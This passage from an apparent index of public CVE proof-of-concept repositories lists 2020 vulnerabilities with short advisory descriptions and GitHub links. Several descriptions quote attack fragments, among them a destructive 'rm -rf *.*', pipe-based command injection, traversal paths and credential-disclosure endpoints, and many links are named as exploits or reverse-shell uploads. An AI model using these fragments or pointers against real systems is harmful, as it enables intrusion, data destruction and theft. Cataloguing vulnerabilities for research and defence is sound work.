[wuzuowei/CVE-2020-17530](https://github.com/wuzuowei/CVE-2020-17530) +- [Al1ex/CVE-2020-17530](https://github.com/Al1ex/CVE-2020-17530) +- [fengziHK/CVE-2020-17530-strust2-061](https://github.com/fengziHK/CVE-2020-17530-strust2-061) +- [ludy-dev/freemarker_RCE_struts2_s2-061](https://github.com/ludy-dev/freemarker_RCE_struts2_s2-061) +- [CyborgSecurity/CVE-2020-17530](https://github.com/CyborgSecurity/CVE-2020-17530) +- [uzzzval/CVE-2020-17530](https://github.com/uzzzval/CVE-2020-17530) +- [killmonday/CVE-2020-17530-s2-061](https://github.com/killmonday/CVE-2020-17530-s2-061) +- [keyuan15/CVE-2020-17530](https://github.com/keyuan15/CVE-2020-17530) +- [nth347/CVE-2020-17530](https://github.com/nth347/CVE-2020-17530) + +### CVE-2020-17531 (2020-12-08) + +A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version. + + +- [154802388/CVE-2020-17531](https://github.com/154802388/CVE-2020-17531) + +### CVE-2020-17533 (2020-12-29) + +Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties. + + +- [pazeray/CVE-2020-17533](https://github.com/pazeray/CVE-2020-17533) + +### CVE-2020-18324 (2022-03-04) + +Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template. + + +- [hamm0nz/CVE-2020-18324](https://github.com/hamm0nz/CVE-2020-18324) + +### CVE-2020-18325 (2022-03-04) + +Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel. + + +- [hamm0nz/CVE-2020-18325](https://github.com/hamm0nz/CVE-2020-18325) + +### CVE-2020-18326 (2022-03-04) + +Cross Site Request Forgery (CSRF) vulnerability exists in Intelliants Subrion CMS v4.2.1 via the Members administrator function, which could let a remote unauthenticated malicious user send an authorised request to victim and successfully create an arbitrary administrator user. + + +- [hamm0nz/CVE-2020-18326](https://github.com/hamm0nz/CVE-2020-18326) + +### CVE-2020-19360 (2021-01-20) + +Local file inclusion in FHEM 6.0 allows in fhem/FileLog_logWrapper file parameter can allow an attacker to include a file, which can lead to sensitive information disclosure. + + +- [a1665454764/CVE-2020-19360](https://github.com/a1665454764/CVE-2020-19360) +- [zzzz966/CVE-2020-19360](https://github.com/zzzz966/CVE-2020-19360) + +### CVE-2020-19586 (2022-09-14) + +Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI. + + +- [Deepak983/CVE-2020-19586](https://github.com/Deepak983/CVE-2020-19586) + +### CVE-2020-19587 (2022-09-14) + +Cross Site Scripting (XSS) vulnerability in configMap parameters in Yellowfin Business Intelligence 7.3 allows remote attackers to run arbitrary code via MIAdminStyles.i4 Admin UI. + + +- [Deepak983/CVE-2020-19587](https://github.com/Deepak983/CVE-2020-19587) + +### CVE-2020-20093 (2022-03-23) + +The Facebook Messenger app for iOS 227.0 and prior and Android 228.1.0.10.116 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages. + + +- [zadewg/RIUS](https://github.com/zadewg/RIUS) + +### CVE-2020-21378 (2020-12-21) + +SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php. + + +- [sukusec301/SeaCMS-v10.1](https://github.com/sukusec301/SeaCMS-v10.1) + +### CVE-2020-23160 (2021-01-22) + +Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to arbitrary commands as root on the devices. + + +- [Outpost24/Pyrescom-Termod-PoC](https://github.com/Outpost24/Pyrescom-Termod-PoC) + +### CVE-2020-23342 (2021-01-19) + +A CSRF vulnerability exists in Anchor CMS 0.12.7 anchor/views/users/edit.php that can change the Delete admin users. + + +- [DXY0411/CVE-2020-23342](https://github.com/DXY0411/CVE-2020-23342) + +### CVE-2020-23489 (2020-11-16) + +The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin. + + +- [ahussam/AVideo3xploit](https://github.com/ahussam/AVideo3xploit) + +### CVE-2020-23582 (2022-11-21) + +A vulnerability in the "/admin/wlmultipleap.asp" of optilink OP-XT71000N version: V2.2 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to create Multiple WLAN BSSID. + + +- [huzaifahussain98/CVE-2020-23582](https://github.com/huzaifahussain98/CVE-2020-23582) + +### CVE-2020-23583 (2022-11-23) + +OPTILINK OP-XT71000N V2.2 is vulnerable to Remote Code Execution. The issue occurs when the attacker sends an arbitrary code on "/diag_ping_admin.asp" to "PingTest" interface that leads to COMMAND EXECUTION. An attacker can successfully trigger the COMMAND and can compromise full system. + + +- [huzaifahussain98/CVE-2020-23583](https://github.com/huzaifahussain98/CVE-2020-23583) + +### CVE-2020-23584 (2022-11-23) + +Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution. + + +- [huzaifahussain98/CVE-2020-23584](https://github.com/huzaifahussain98/CVE-2020-23584) + +### CVE-2020-23585 (2022-11-23) + +A remote attacker can conduct a cross-site request forgery (CSRF) attack on OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028. The vulnerability is due to insufficient CSRF protections for the "mgm_config_file.asp" because of which attacker can create a crafted "csrf form" which sends " malicious xml data" to "/boaform/admin/formMgmConfigUpload". the exploit allows attacker to "gain full privileges" and to "fully compromise of router & network". + + +- [huzaifahussain98/CVE-2020-23585](https://github.com/huzaifahussain98/CVE-2020-23585) + +### CVE-2020-23586 (2022-11-23) + +A vulnerability found in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Add Network Traffic Control Type Rule. + + +- [huzaifahussain98/CVE-2020-23586](https://github.com/huzaifahussain98/CVE-2020-23586) + +### CVE-2020-23587 (2022-11-23) + +A vulnerability found in the OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to men in the middle attack by adding New Routes in RoutingConfiguration on " /routing.asp ". + + +- [huzaifahussain98/CVE-2020-23587](https://github.com/huzaifahussain98/CVE-2020-23587) + +### CVE-2020-23588 (2022-11-23) + +A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to "Enable or Disable Ports" and to "Change port number" through " /rmtacc.asp ". + + +- [huzaifahussain98/CVE-2020-23588](https://github.com/huzaifahussain98/CVE-2020-23588) + +### CVE-2020-23589 (2022-11-23) + +A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to cause a Denial of Service by Rebooting the router through " /mgm_dev_reboot.asp." + + +- [huzaifahussain98/CVE-2020-23589](https://github.com/huzaifahussain98/CVE-2020-23589) + +### CVE-2020-23590 (2022-11-23) + +A vulnerability in Optilink OP-XT71000N Hardware version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated remote attacker to conduct a cross-site request forgery (CSRF) attack to change the Password for "WLAN SSID" through "wlwpa.asp". + + +- [huzaifahussain98/CVE-2020-23590](https://github.com/huzaifahussain98/CVE-2020-23590) + +### CVE-2020-23591 (2022-11-23) + +A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an attacker to upload arbitrary files through " /mgm_dev_upgrade.asp " which can "delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor. + + +- [huzaifahussain98/CVE-2020-23591](https://github.com/huzaifahussain98/CVE-2020-23591) + +### CVE-2020-23592 (2022-11-23) + +A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Reset ONU to Factory Default through ' /mgm_dev_reset.asp.' Resetting to default leads to Escalation of Privileges by logging-in with default credentials. + + +- [huzaifahussain98/CVE-2020-23592](https://github.com/huzaifahussain98/CVE-2020-23592) + +### CVE-2020-23593 (2022-11-23) + +A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross site request forgery (CSRF) attack to enable syslog mode through ' /mgm_log_cfg.asp.' The system starts to log events, 'Remote' mode or 'Both' mode on "Syslog -- Configuration page" logs events and sends to remote syslog server IP and Port. + + +- [huzaifahussain98/CVE-2020-23593](https://github.com/huzaifahussain98/CVE-2020-23593) + +### CVE-2020-23839 (2020-09-01) + +A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form. + + +- [boku7/CVE-2020-23839](https://github.com/boku7/CVE-2020-23839) + +### CVE-2020-23934 (2020-08-18) + +An issue was discovered in RiteCMS 2.2.1. An authenticated user can directly execute system commands by uploading a php web shell in the "Filemanager" section. + + +- [H0j3n/CVE-2020-23934](https://github.com/H0j3n/CVE-2020-23934) + +### CVE-2020-23968 (2020-11-10) + +Ilex International Sign&go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\Ilex\S&G\Logs\000-sngWSService1.log. + + +- [ricardojba/CVE-2020-23968-ILEX-SignGo-EoP](https://github.com/ricardojba/CVE-2020-23968-ILEX-SignGo-EoP) + +### CVE-2020-24028 (2020-09-02) + +ForLogic Qualiex v1 and v3 allows any authenticated customer to achieve privilege escalation via user creations, password changes, or user permission updates. + + +- [underprotection/CVE-2020-24028](https://github.com/underprotection/CVE-2020-24028) +- [redteambrasil/CVE-2020-24028](https://github.com/redteambrasil/CVE-2020-24028) + +### CVE-2020-24029 (2020-09-02) + +Because of unauthenticated password changes in ForLogic Qualiex v1 and v3, customer and admin permissions and data can be accessed via a simple request. + + +- [underprotection/CVE-2020-24029](https://github.com/underprotection/CVE-2020-24029) +- [redteambrasil/CVE-2020-24029](https://github.com/redteambrasil/CVE-2020-24029) + +### CVE-2020-24030 (2020-09-02) + +ForLogic Qualiex v1 and v3 has weak token expiration. This allows remote unauthenticated privilege escalation and access to sensitive data via token reuse. + + +- [underprotection/CVE-2020-24030](https://github.com/underprotection/CVE-2020-24030) +- [redteambrasil/CVE-2020-24030](https://github.com/redteambrasil/CVE-2020-24030) + +### CVE-2020-24032 (2020-08-18) + +tz.pl on XoruX LPAR2RRD and STOR2RRD 2.70 virtual appliances allows cmd=set&tz=OS command injection via shell metacharacters in a timezone. + + +- [jet-pentest/CVE-2020-24032](https://github.com/jet-pentest/CVE-2020-24032) + +### CVE-2020-24033 (2020-10-22) + +An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges. + + +- [M0NsTeRRR/CVE-2020-24033](https://github.com/M0NsTeRRR/CVE-2020-24033) + +### CVE-2020-24088 (2023-09-11) + +An issue was discovered in MmMapIoSpace routine in Foxconn Live Update Utility 2.1.6.26, allows local attackers to escalate privileges. + + +- [rjt-gupta/CVE-2020-24088](https://github.com/rjt-gupta/CVE-2020-24088) + +### CVE-2020-24089 (2023-09-19) + +An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS). + + +- [rjt-gupta/CVE-2020-24089](https://github.com/rjt-gupta/CVE-2020-24089) + +### CVE-2020-24148 (2021-07-07) + +Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + + +- [dwisiswant0/CVE-2020-24148](https://github.com/dwisiswant0/CVE-2020-24148) + +### CVE-2020-24186 (2020-08-24) + +A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action. + + +- [hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE](https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE) +- [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186) +- [Sakura-501/CVE-2020-24186-exploit](https://github.com/Sakura-501/CVE-2020-24186-exploit) +- [substing/CVE-2020-24186_reverse_shell_upload](https://github.com/substing/CVE-2020-24186_reverse_shell_upload) + +### CVE-2020-24227 (2020-11-23) + +Playground Sessions v2.5.582 (and earlier) for Windows, stores the user credentials in plain text allowing anyone with access to UserProfiles.sol to extract the email and password. + + +- [nathunandwani/CVE-2020-24227](https://github.com/nathunandwani/CVE-2020-24227) + +### CVE-2020-24370 (2020-08-17) + +ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31). + + +- [RenukaSelvar/lua_CVE-2020-24370](https://github.com/RenukaSelvar/lua_CVE-2020-24370) +- [RenukaSelvar/lua_CVE-2020-24370_AfterPatch](https://github.com/RenukaSelvar/lua_CVE-2020-24370_AfterPatch) + +### CVE-2020-24490 (2021-02-02) + +Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ. + + +- [AbrarKhan/linux_CVE-2020-24490-beforePatch](https://github.com/AbrarKhan/linux_CVE-2020-24490-beforePatch) +- [AbrarKhan/Linux-4.19.72_CVE-2020-24490](https://github.com/AbrarKhan/Linux-4.19.72_CVE-2020-24490) + +### CVE-2020-24572 (2020-08-24) + +An issue was discovered in includes/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS (Raspberry Pi) running this software, and execute commands on the system (including ones for uploading of files and execution of code). + + +- [lb0x/cve-2020-24572](https://github.com/lb0x/cve-2020-24572) +- [gerbsec/CVE-2020-24572-POC](https://github.com/gerbsec/CVE-2020-24572-POC) + +### CVE-2020-24597 +- [HoangKien1020/CVE-2020-24597](https://github.com/HoangKien1020/CVE-2020-24597) + +### CVE-2020-24616 (2020-08-25) + +FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP). + + +- [0xkami/cve-2020-24616-poc](https://github.com/0xkami/cve-2020-24616-poc) + +### CVE-2020-24656 (2020-08-26) + +Maltego before 4.2.12 allows XXE attacks. + + +- [terzinodipaese/Internet-Security-Project](https://github.com/terzinodipaese/Internet-Security-Project) + +### CVE-2020-24750 (2020-09-17) + +FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. + + +- [Al1ex/CVE-2020-24750](https://github.com/Al1ex/CVE-2020-24750) + +### CVE-2020-24765 (2020-10-20) + +InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request. + + +- [fbkcs/CVE-2020-24765](https://github.com/fbkcs/CVE-2020-24765) + +### CVE-2020-24815 (2020-11-24) + +A Server-Side Request Forgery (SSRF) affecting the PDF generation in MicroStrategy 10.4, 2019 before Update 6, and 2020 before Update 2 allows authenticated users to access the content of internal network resources or leak files from the local system via HTML containers embedded in a dossier/dashboard document. NOTE: 10.4., no fix will be released as version will reach end-of-life on 31/12/2020. + + +- [darkvirus-7x/exploit-CVE-2020-24815](https://github.com/darkvirus-7x/exploit-CVE-2020-24815) + +### CVE-2020-24881 (2020-11-02) + +SSRF exists in osTicket before 1.14.3, where an attacker can add malicious file to server or perform port scanning. + + +- [harshtech123/cve-2020-24881](https://github.com/harshtech123/cve-2020-24881) + +### CVE-2020-24913 (2021-03-04) + +A SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request. + + +- [agarma/CVE-2020-24913-PoC](https://github.com/agarma/CVE-2020-24913-PoC) + +### CVE-2020-24949 (2020-09-03) + +Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). + + +- [r90tpass/CVE-2020-24949](https://github.com/r90tpass/CVE-2020-24949) + +### CVE-2020-24955 (2020-09-01) + +SUPERAntiSyware Professional X Trial 10.0.1206 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the system32 folder via an NTFS directory junction, as demonstrated by a crafted ualapi.dll file that is detected as malware. + + +- [nmht3t/CVE-2020-24955](https://github.com/nmht3t/CVE-2020-24955) + +### CVE-2020-24972 (2020-08-29) + +The Kleopatra component before 3.1.12 (and before 20.07.80) for GnuPG allows remote attackers to execute arbitrary code because openpgp4fpr: URLs are supported without safe handling of command-line options. The Qt platformpluginpath command-line option can be used to load an arbitrary DLL. + + +- [SpiralBL0CK/CVE-2020-24972](https://github.com/SpiralBL0CK/CVE-2020-24972) + +### CVE-2020-25068 (2020-09-03) + +Setelsa Conacwin v3.7.1.2 is vulnerable to a local file inclusion vulnerability. This vulnerability allows a remote unauthenticated attacker to read internal files on the server via an http:IP:PORT/../../path/file_to_disclose Directory Traversal URI. NOTE: The manufacturer indicated that the affected version does not exist. Furthermore, they indicated that they detected this problem in an internal audit more than 3 years ago and fixed it in 2017. + + +- [bryanroma/CVE-2020-25068](https://github.com/bryanroma/CVE-2020-25068) + +### CVE-2020-25078 (2020-09-02) + +An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. + + +- [MzzdToT/CVE-2020-25078](https://github.com/MzzdToT/CVE-2020-25078) +- [chinaYozz/CVE-2020-25078](https://github.com/chinaYozz/CVE-2020-25078) + +### CVE-2020-25134 (2020-09-25) + +An issue was discovered in Observium Professional, Enterprise & Community 20.8.10631. It is vulnerable to directory traversal and local file inclusion due to the fact that there is an unrestricted possibility of loading any file with an inc.php extension. Inclusion of other files (even though limited to the mentioned extension) can lead to Remote Code Execution. This can occur via /settings/?format=../ URIs to pages/settings.inc.php. + + +- [ynsmroztas/CVE-2020-25134](https://github.com/ynsmroztas/CVE-2020-25134) + +### CVE-2020-25200 (2020-10-01) + +Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely. Note: This has been disputed by the vendor as not a vulnerability. They argue that this is an intended design + + +- [lukaszstu/pritunl-CVE-2020-25200](https://github.com/lukaszstu/pritunl-CVE-2020-25200) + +### CVE-2020-25213 (2020-09-09) + +The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020. + + +- [mansoorr123/wp-file-manager-CVE-2020-25213](https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213) +- [kakamband/WPKiller](https://github.com/kakamband/WPKiller) +- [forse01/CVE-2020-25213-Wordpress](https://github.com/forse01/CVE-2020-25213-Wordpress) +- [0000000O0Oo/Wordpress-CVE-2020-25213](https://github.com/0000000O0Oo/Wordpress-CVE-2020-25213) +- [piruprohacking/CVE-2020-25213](https://github.com/piruprohacking/CVE-2020-25213) +- [b1ackros337/CVE-2020-25213](https://github.com/b1ackros337/CVE-2020-25213) +- [BLY-Coder/Python-exploit-CVE-2020-25213](https://github.com/BLY-Coder/Python-exploit-CVE-2020-25213) +- [E1tex/Python-CVE-2020-25213](https://github.com/E1tex/Python-CVE-2020-25213) +- [Nguyen-id/CVE-2020-25213](https://github.com/Nguyen-id/CVE-2020-25213) + +### CVE-2020-25223 (2020-09-25) + +A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 + + +- [darrenmartyn/sophucked](https://github.com/darrenmartyn/sophucked) +- [twentybel0w/CVE-2020-25223](https://github.com/twentybel0w/CVE-2020-25223) +- [reneww/poc-CVE-2020-25223](https://github.com/reneww/poc-CVE-2020-25223) + +### CVE-2020-25265 (2020-12-02) + +AppImage libappimage before 1.0.3 allows attackers to trigger an overwrite of a system-installed .desktop file by providing a .desktop file that contains Name= with path components. + + +- [refi64/CVE-2020-25265-25266](https://github.com/refi64/CVE-2020-25265-25266) + +### CVE-2020-25270 (2020-10-08) + +PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, or City. + + +- [Ko-kn3t/CVE-2020-25270](https://github.com/Ko-kn3t/CVE-2020-25270) + +### CVE-2020-25271 (2020-10-08) + +PHPGurukul hospital-management-system-in-php 4.0 allows XSS via admin/patient-search.php, doctor/search.php, book-appointment.php, doctor/appointment-history.php, or admin/appointment-history.php. + + +- [Ko-kn3t/CVE-2020-25271](https://github.com/Ko-kn3t/CVE-2020-25271) + +### CVE-2020-25272 (2020-10-08) + +In SourceCodester Online Bus Booking System 1.0, there is XSS through the name parameter in book_now.php. + + +- [Ko-kn3t/CVE-2020-25272](https://github.com/Ko-kn3t/CVE-2020-25272) + +### CVE-2020-25273 (2020-10-08) + +In SourceCodester Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection. + + +- [Ko-kn3t/CVE-2020-25273](https://github.com/Ko-kn3t/CVE-2020-25273) + +### CVE-2020-25398 (2020-11-05) + +CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality. + + +- [h3llraiser/CVE-2020-25398](https://github.com/h3llraiser/CVE-2020-25398) + +### CVE-2020-25399 (2020-11-05) + +Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat. + + +- [h3llraiser/CVE-2020-25399](https://github.com/h3llraiser/CVE-2020-25399) + +### CVE-2020-25478 +- [santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack](https://github.com/santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack) + +### CVE-2020-25487 (2020-09-22) + +PHPGURUKUL Zoo Management System Using PHP and MySQL version 1.0 is affected by: SQL Injection via zms/animal-detail.php. + + +- [Ko-kn3t/CVE-2020-25487](https://github.com/Ko-kn3t/CVE-2020-25487) + +### CVE-2020-25488 +- [Ko-kn3t/CVE-2020-25488](https://github.com/Ko-kn3t/CVE-2020-25488) + +### CVE-2020-25498 (2021-01-06) + +Cross Site Scripting (XSS) vulnerability in Beetel router 777VR1 can be exploited via the NTP server name in System Time and "Keyword" in URL Filter. + + +- [the-girl-who-lived/CVE-2020-25498](https://github.com/the-girl-who-lived/CVE-2020-25498) + +### CVE-2020-25514 (2020-09-22) + +Sourcecodester Simple Library Management System 1.0 is affected by Incorrect Access Control via the Login Panel, http://<site>/lms/admin.php. + + +- [Ko-kn3t/CVE-2020-25514](https://github.com/Ko-kn3t/CVE-2020-25514) + +### CVE-2020-25515 (2020-09-22) + +Sourcecodester Simple Library Management System 1.0 is affected by Insecure Permissions via Books > New Book , http://<site>/lms/index.php?page=books. + + +- [Ko-kn3t/CVE-2020-25515](https://github.com/Ko-kn3t/CVE-2020-25515) + +### CVE-2020-25518 +- [g-rubert/wordpress_DoS](https://github.com/g-rubert/wordpress_DoS) + +### CVE-2020-25540 (2020-09-14) + +ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. + + +- [Schira4396/CVE-2020-25540](https://github.com/Schira4396/CVE-2020-25540) +- [RajChowdhury240/ThinkAdmin-CVE-2020-25540](https://github.com/RajChowdhury240/ThinkAdmin-CVE-2020-25540) +- [lowkey0808/cve-2020-25540](https://github.com/lowkey0808/cve-2020-25540) +- [simonlee-hello/CVE-2020-25540](https://github.com/simonlee-hello/CVE-2020-25540) + +### CVE-2020-25578 (2021-03-26) + +In FreeBSD 12.2-STABLE before r368969, 11.4-STABLE before r369047, 12.2-RELEASE before p3, 12.1-RELEASE before p13 and 11.4-RELEASE before p7 several file systems were not properly initializing the d_off field of the dirent structures returned by VOP_READDIR. In particular, tmpfs(5), smbfs(5), autofs(5) and mqueuefs(5) were failing to do so. As a result, eight uninitialized kernel stack bytes may be leaked to userspace by these file systems. + + +- [farazsth98/freebsd-dirent-info-leak-bugs](https://github.com/farazsth98/freebsd-dirent-info-leak-bugs) + +### CVE-2020-25613 (2020-10-06) + +An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack. + + +- [metapox/CVE-2020-25613](https://github.com/metapox/CVE-2020-25613) + +### CVE-2020-25627 (2020-12-09) + +The moodlenetprofile user profile field required extra sanitizing to prevent a stored XSS risk. This affects versions 3.9 to 3.9.1. Fixed in 3.9.2. + + +- [HoangKien1020/CVE-2020-25627](https://github.com/HoangKien1020/CVE-2020-25627) + +### CVE-2020-25632 (2021-03-03) + +A flaw was found in grub2 in versions prior to 2.06. The rmmod implementation allows the unloading of a module used as a dependency without checking if any other dependent module is still loaded leading to a use-after-free scenario. This could allow arbitrary code to be executed or a bypass of Secure Boot protections. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix) + +### CVE-2020-25637 (2020-10-06) + +A double free memory issue was found to occur in the libvirt API, in versions before 6.8.0, responsible for requesting information about network interfaces of a running QEMU domain. This flaw affects the polkit access control driver. Specifically, clients connecting to the read-write socket with limited ACL permissions could use this flaw to crash the libvirt daemon, resulting in a denial of service, or potentially escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [brahmiboudjema/CVE-2020-25637-libvirt-double-free](https://github.com/brahmiboudjema/CVE-2020-25637-libvirt-double-free) + +### CVE-2020-25668 (2021-05-26) + +A flaw was found in Linux Kernel because access to the global variable fg_console is not properly synchronized leading to a use after free in con_font_op. + + +- [hshivhare67/Kernel_4.1.15_CVE-2020-25668](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2020-25668) + +### CVE-2020-25686 (2021-01-20) + +A flaw was found in dnsmasq before version 2.83. When receiving a query, dnsmasq does not check for an existing pending request for the same name and forwards a new request. By default, a maximum of 150 pending queries can be sent to upstream servers, so there can be at most 150 queries for the same name. This flaw allows an off-path attacker on the network to substantially reduce the number of attempts that it would have to perform to forge a reply and have it accepted by dnsmasq. This issue is mentioned in the "Birthday Attacks" section of RFC5452. If chained with CVE-2020-25684, the attack complexity of a successful attack is reduced. The highest threat from this vulnerability is to data integrity. + + +- [knqyf263/dnspooq](https://github.com/knqyf263/dnspooq) + +### CVE-2020-25705 (2020-11-17) + +A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization are indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version + + +- [tdwyer/CVE-2020-25705](https://github.com/tdwyer/CVE-2020-25705) +- [nanopathi/linux-4.19.72_CVE-2020-25705](https://github.com/nanopathi/linux-4.19.72_CVE-2020-25705) + +### CVE-2020-25747 (2020-09-25) + +The Telnet service of Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) can allow a remote attacker to gain access to RTSP and ONFIV services without authentication. Thus, the attacker can watch live streams from the camera, rotate the camera, change some settings (brightness, clarity, time), restart the camera, or reset it to factory settings. + + +- [jet-pentest/CVE-2020-25747](https://github.com/jet-pentest/CVE-2020-25747) + +### CVE-2020-25748 (2020-09-25) + +A Cleartext Transmission issue was discovered on Rubetek RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339). Someone in the middle can intercept and modify the video data from the camera, which is transmitted in an unencrypted form. One can also modify responses from NTP and RTSP servers and force the 